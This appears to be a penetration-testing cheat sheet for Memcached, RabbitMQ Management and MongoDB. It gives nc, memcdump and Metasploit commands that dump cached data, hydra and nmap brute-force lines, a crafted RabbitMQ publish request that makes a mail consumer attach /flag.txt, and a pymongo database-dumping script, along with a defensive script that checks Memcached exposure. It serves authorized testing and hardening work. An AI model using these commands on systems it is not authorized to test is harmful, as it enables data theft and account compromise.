11211-Memcache

Service enumeration

echo "version" | nc -vn -w 1 <IP> 11211      #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info

#This php snippet only dumps the key names; use "get <item_name>" afterwards to read a value
sudo apt-get install php-memcached
php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'

Tool-based enumeration

sudo apt install libmemcached-tools
memcstat --servers=127.0.0.1 #Get stats
memcdump --servers=127.0.0.1 #Get all items
memccat --servers=127.0.0.1 <item1> <item2> <item3> #Get info inside the item(s)

Automation

nmap -n -sV --script memcached-info -p 11211 <IP>    #Just gather info
msf > use auxiliary/gather/memcached_extractor #Extracts saved data
msf > use auxiliary/scanner/memcached/memcached_amp #Check if a UDP DDoS amplification attack is possible
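The stats commands above return the text protocol's STAT lines, and memcached_amp checks one consequence of an exposed instance (UDP amplification). Memcached also reports its own configuration in stats settings, which is enough to tell an operator what to fix. The Python below is an added example, not from the original page or the memcached project: it parses constructed stats and stats settings output (field names are the ones memcached prints; the values are made up) into a dict and turns the listen interface, UDP port and SASL settings into findings with the corresponding remediation.

```python
# Constructed sample output of "stats" and "stats settings" (not captured from a real host).
SAMPLE_STATS = """STAT pid 1234
STAT uptime 864000
STAT version 1.6.9
STAT curr_connections 12
STAT curr_items 48213
STAT total_items 901337
STAT bytes 73400320
END
"""

SAMPLE_SETTINGS = """STAT maxbytes 67108864
STAT maxconns 1024
STAT tcpport 11211
STAT udpport 11211
STAT inter NULL
STAT auth_enabled_sasl no
END
"""


def parse_stats(text):
    """Parse 'STAT <name> <value>' lines into a dict; stop at END, skip ERROR lines."""
    stats = {}
    for line in text.splitlines():
        line = line.strip()
        if line == "END":
            break
        if not line.startswith("STAT "):
            continue  # "ERROR", "SERVER_ERROR ..." or blank lines
        _, name, value = line.split(" ", 2)
        stats[name] = value
    return stats


def assess_exposure(stats, settings):
    """Return (severity, message) findings from parsed 'stats' and 'stats settings' output."""
    findings = []
    listen = settings.get("inter", "NULL")  # NULL = no -l option = every interface
    loopback = listen in ("127.0.0.1", "::1", "localhost")
    if not loopback:
        where = "all interfaces" if listen == "NULL" else listen
        findings.append(("high", "listens on %s (TCP %s): every key is readable by anyone who can "
                         "reach the port; bind with -l 127.0.0.1 or firewall it"
                         % (where, settings.get("tcpport", "?"))))
    if settings.get("udpport", "0") != "0":
        findings.append(("high", "UDP port %s enabled: abusable for DDoS amplification; start with -U 0"
                         % settings["udpport"]))
    if settings.get("auth_enabled_sasl", "no") != "yes" and not loopback:
        findings.append(("medium", "no SASL authentication on a non-loopback listener"))
    items = int(stats.get("curr_items", "0"))
    if items:
        findings.append(("info", "%d items / %s bytes currently cached would be exposed"
                         % (items, stats.get("bytes", "?"))))
    return findings


if __name__ == "__main__":
    for sev, msg in assess_exposure(parse_stats(SAMPLE_STATS), parse_stats(SAMPLE_SETTINGS)):
        print("[%s] %s" % (sev, msg))
```

Feed the real output of the two nc commands above to parse_stats to assess a live instance; the check covers the configuration memcached itself reports, so a host-level firewall review is still needed for the network side.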

15672-RabbitMQ Management

Enable the plugin

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Brute force

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpS

API usage

1) API information

http://localhost:15672/api/connections

2) Publish a message via the API

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"[email protected]\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

refer: https://book.hacktricks.xyz/pentesting/15672-pentesting-rabbitmq-management

27017/27018: MongoDB

Automated enumeration

nmap -sV --script "mongo* and default" -p 27017 <IP>   #By default all the nmap mongo enumeration scripts are used

Manual enumeration

from pymongo import MongoClient

# Fill in the target; username/password stay None for unauthenticated instances
host, port = "<IP>", 27017
username, password = None, None

client = MongoClient(host, port, username=username, password=password)
print(client.server_info()) #Basic info
#If you have admin access you can obtain more info
admin = client.admin
admin_info = admin.command("serverStatus")
for db in client.list_databases():
    print(db)
    print(client[db["name"]].list_collection_names())
#If admin access, you could dump the database also

Connect and log in

mongo <HOST>
mongo <HOST>:<PORT>
mongo <HOST>:<PORT>/<DB>
mongo <database> -u <username> -p '<password>'

Brute force

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login

refer: https://book.hacktricks.xyz/pentesting/27017-27018-mongodb


Reference